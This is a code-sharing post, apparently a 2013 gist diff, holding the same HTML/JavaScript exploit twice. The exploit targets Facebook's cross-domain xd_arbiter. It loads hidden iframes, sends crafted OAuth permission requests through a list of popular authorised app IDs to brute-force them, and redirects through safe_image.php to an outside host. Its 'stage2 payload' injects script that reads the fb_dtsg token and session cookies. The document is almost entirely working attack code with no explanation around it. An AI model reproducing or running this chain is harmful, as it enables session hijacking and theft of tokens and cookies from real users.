phwd · May 23, 2013 20:23
diff --git a/gistfile1.html b/gistfile1.html
 <html>
 <head></head>
 <body onload="go()">
  <div id="log_div"></div>
 	<script>
 		function my_log(message) { document.getElementById('log_div').innerHTML += (message.toString() + "<br />");	}
 		
 		// wiretap
 		(window.addEventListener || window.attachEvent)('message', function(e) { console.log('wiretap: ' + e.data); my_log("wiretap: " + e.data); }, false);			 
 			
 		function load_frame(_name, _url)
 		{
 			var x = 
 				(/MSIE (6|7|8)/).test(navigator.userAgent) ?
 					document.createElement('<iframe name="' + _name + '">')
 				:
 					document.createElement('iframe');
 			//x.style.display = "none";
 			x.style.width = 1;
 			x.style.height = 1;
 			//x.src = 'javascript:false';
 			x.name = _name;
 			x.id = _name;
 			document.body.appendChild(x);
 			x.src = _url;
 			
 			// for firefox
 			// x.src = _url;
 			//frames[_name].location = _url;
 		}
 			
 		function setup_proxy2()
 		{
 			my_log("setup_proxy2 start");
 			load_frame("fb_xdm_frame_http2", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel&origin=http%3A%2F%2Ffacebook.com&transport=flash");
 			my_log("setup_proxy2 finished");
 		}
 		
 		function setup_proxy()
 		{
 			my_log("setup_proxy start");
 			load_frame("fb_xdm_frame_http", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel_http&origin=http%3A%2F%2Ffacebook.com&transport=flash");
 			my_log("setup_proxy finished");
 		}
 		
 		function deliver_stage0_payload_through(authorized_app_id)
 		{
 			my_log("deliver_stage0_payload_through start (authorized_app_id = " + authorized_app_id + ")");
 			if(!reverse_shell_bound)
 			{
 				var jssdk_app_id = 114545895322903;
 				var reverse_shell_payload_endpoint =
 					// stage 0 -> jmp color map
 					"http://www.facebook.com/safe_image.php?d=AQCpZd43YhJr_orL&url=http%3A%2F%2Ffbdkit.netai.net%2Fpagetab%2Fline_256_half_29.gif"

 				load_frame("fb_xdm_frame_http" + authorized_app_id.toString(), "http://facebook.com/connect/xd_arbiter.php?version=11#FB_RPC:{\"method\":\"showDialog\", \"params\":[{\"=&relation=parent&\":0, \"&origin=http%3A%2F%2Ffacebook.com&\":0,\"method\":\"permissions.request\",\"abc\":\"qwa\",\"display\":\"page\", \"app_id\":\"" + authorized_app_id + "\", \"response_type\":\"token,signed_request,code\", \"redirect_uri\":\"http://facebook.com/dialog/oauth?client_id=" + jssdk_app_id + "&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.facebook.com&redirect_uri=" + encodeURIComponent(reverse_shell_payload_endpoint) + "&sdk=joey\"}]}");
 				setTimeout(function() { deliver_stage0_payload_through(authorized_app_id); }, 3000);
 			}
 			my_log("deliver_stage0_payload_through finished");
 		}
 		
 		
 		var reverse_shell_bound = false;
 		var reverse_shell_bound_keyphrase = "FB_RPC:reverse_shell_bound";
 		
 		(window.addEventListener || window.attachEvent)('message', 
 			function(event){ 
 				reverse_shell_bound = event.data == reverse_shell_bound_keyphrase;
 			}, false);
 		
 		function deliver_stage2_payload(stage2_payload)
 		{
 			// Connection acknowledgement received, delivering stage2 payload
 			if(reverse_shell_bound)
 			{
 				parent.postMessage(stage2_payload, "http://www.facebook.com");
 			}
 			else
 			{
 				var report_keyphrase_payload = 
 					"for(var fr = 0; fr < window.frames.length; fr++)" +
 					"{ window.frames[fr].postMessage(\"" + reverse_shell_bound_keyphrase + "\", \"http://fbdkit.netai.net\") }";
 				parent.postMessage(report_keyphrase_payload, "http://www.facebook.com");
 				setTimeout(function() { deliver_stage2_payload(stage2_payload) }, 300)
 			}
 		}
 			
 		function go()
 		{
 			var lag = 100;
 			
 			setTimeout(setup_proxy2, lag); 		// sender-xd_arbiter
 			setTimeout(setup_proxy, lag);		// proxy-xd_arbiter
 			
 			var authorized_app_ids_to_check = 
 			[
 				111239619098,		// bing
 				139475280761,		// pandora
 				162729813767876,	// tripadvisor
 				97534753161, 		// yelp
 				326803741017,		// rottentomatoes
 				175789541954,		// clicker
 				136494494209,		// scribd
 				119178388096593,	// docs
 				176611639027113,	// zynga
 				111071104403,		// kixeye
 				221300197978270,	// ea
 				
 				// additional
 				
 				120131118061981,	// freelancer.com 
 				113869198637480,	// developers.facebook.com <- every app developers should have authorized it
 				114545895322903,	// js sdk
 				178222352279634, 	// angry birds!
 			];
 			
 			for(var id_num = 0; id_num < authorized_app_ids_to_check.length; id_num++)
 			{
 				// multiple payload-xd_arbiters to bruteforce authorized apps
 				setTimeout("deliver_stage0_payload_through(" + authorized_app_ids_to_check[id_num] + ")", 500 + lag + 50*id_num);
 			}
 			
 			deliver_stage2_payload("alert('hi there! fb_dtsg =  ' + Env.fb_dtsg + ', cookies: ' + document.cookie)");
 		}
 		
 	  </script>
 </body>
 </html>
	<html>
	<head></head>
	<body onload="go()">
	<div id="log_div"></div>
	<script>
	function my_log(message) { document.getElementById('log_div').innerHTML += (message.toString() + "<br />"); }

	// wiretap
	(window.addEventListener \|\| window.attachEvent)('message', function(e) { console.log('wiretap: ' + e.data); my_log("wiretap: " + e.data); }, false);

	function load_frame(_name, _url)
	{
	var x =
	(/MSIE (6\|7\|8)/).test(navigator.userAgent) ?
	document.createElement('<iframe name="' + _name + '">')
	:
	document.createElement('iframe');
	//x.style.display = "none";
	x.style.width = 1;
	x.style.height = 1;
	//x.src = 'javascript:false';
	x.name = _name;
	x.id = _name;
	document.body.appendChild(x);
	x.src = _url;

	// for firefox
	// x.src = _url;
	//frames[_name].location = _url;
	}

	function setup_proxy2()
	{
	my_log("setup_proxy2 start");
	load_frame("fb_xdm_frame_http2", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel&origin=http%3A%2F%2Ffacebook.com&transport=flash");
	my_log("setup_proxy2 finished");
	}

	function setup_proxy()
	{
	my_log("setup_proxy start");
	load_frame("fb_xdm_frame_http", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel_http&origin=http%3A%2F%2Ffacebook.com&transport=flash");
	my_log("setup_proxy finished");
	}

	function deliver_stage0_payload_through(authorized_app_id)
	{
	my_log("deliver_stage0_payload_through start (authorized_app_id = " + authorized_app_id + ")");
	if(!reverse_shell_bound)
	{
	var jssdk_app_id = 114545895322903;
	var reverse_shell_payload_endpoint =
	// stage 0 -> jmp color map
	"http://www.facebook.com/safe_image.php?d=AQCpZd43YhJr_orL&url=http%3A%2F%2Ffbdkit.netai.net%2Fpagetab%2Fline_256_half_29.gif"

	load_frame("fb_xdm_frame_http" + authorized_app_id.toString(), "http://facebook.com/connect/xd_arbiter.php?version=11#FB_RPC:{\"method\":\"showDialog\", \"params\":[{\"=&relation=parent&\":0, \"&origin=http%3A%2F%2Ffacebook.com&\":0,\"method\":\"permissions.request\",\"abc\":\"qwa\",\"display\":\"page\", \"app_id\":\"" + authorized_app_id + "\", \"response_type\":\"token,signed_request,code\", \"redirect_uri\":\"http://facebook.com/dialog/oauth?client_id=" + jssdk_app_id + "&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.facebook.com&redirect_uri=" + encodeURIComponent(reverse_shell_payload_endpoint) + "&sdk=joey\"}]}");
	setTimeout(function() { deliver_stage0_payload_through(authorized_app_id); }, 3000);
	}
	my_log("deliver_stage0_payload_through finished");
	}


	var reverse_shell_bound = false;
	var reverse_shell_bound_keyphrase = "FB_RPC:reverse_shell_bound";

	(window.addEventListener \|\| window.attachEvent)('message',
	function(event){
	reverse_shell_bound = event.data == reverse_shell_bound_keyphrase;
	}, false);

	function deliver_stage2_payload(stage2_payload)
	{
	// Connection acknowledgement received, delivering stage2 payload
	if(reverse_shell_bound)
	{
	parent.postMessage(stage2_payload, "http://www.facebook.com");
	}
	else
	{
	var report_keyphrase_payload =
	"for(var fr = 0; fr < window.frames.length; fr++)" +
	"{ window.frames[fr].postMessage(\"" + reverse_shell_bound_keyphrase + "\", \"http://fbdkit.netai.net\") }";
	parent.postMessage(report_keyphrase_payload, "http://www.facebook.com");
	setTimeout(function() { deliver_stage2_payload(stage2_payload) }, 300)
	}
	}

	function go()
	{
	var lag = 100;

	setTimeout(setup_proxy2, lag); // sender-xd_arbiter
	setTimeout(setup_proxy, lag); // proxy-xd_arbiter

	var authorized_app_ids_to_check =
	[
	111239619098, // bing
	139475280761, // pandora
	162729813767876, // tripadvisor
	97534753161, // yelp
	326803741017, // rottentomatoes
	175789541954, // clicker
	136494494209, // scribd
	119178388096593, // docs
	176611639027113, // zynga
	111071104403, // kixeye
	221300197978270, // ea

	// additional

	120131118061981, // freelancer.com
	113869198637480, // developers.facebook.com <- every app developers should have authorized it
	114545895322903, // js sdk
	178222352279634, // angry birds!
	];

	for(var id_num = 0; id_num < authorized_app_ids_to_check.length; id_num++)
	{
	// multiple payload-xd_arbiters to bruteforce authorized apps
	setTimeout("deliver_stage0_payload_through(" + authorized_app_ids_to_check[id_num] + ")", 500 + lag + 50*id_num);
	}

	deliver_stage2_payload("alert('hi there! fb_dtsg = ' + Env.fb_dtsg + ', cookies: ' + document.cookie)");
	}

	</script>
	</body>
	</html>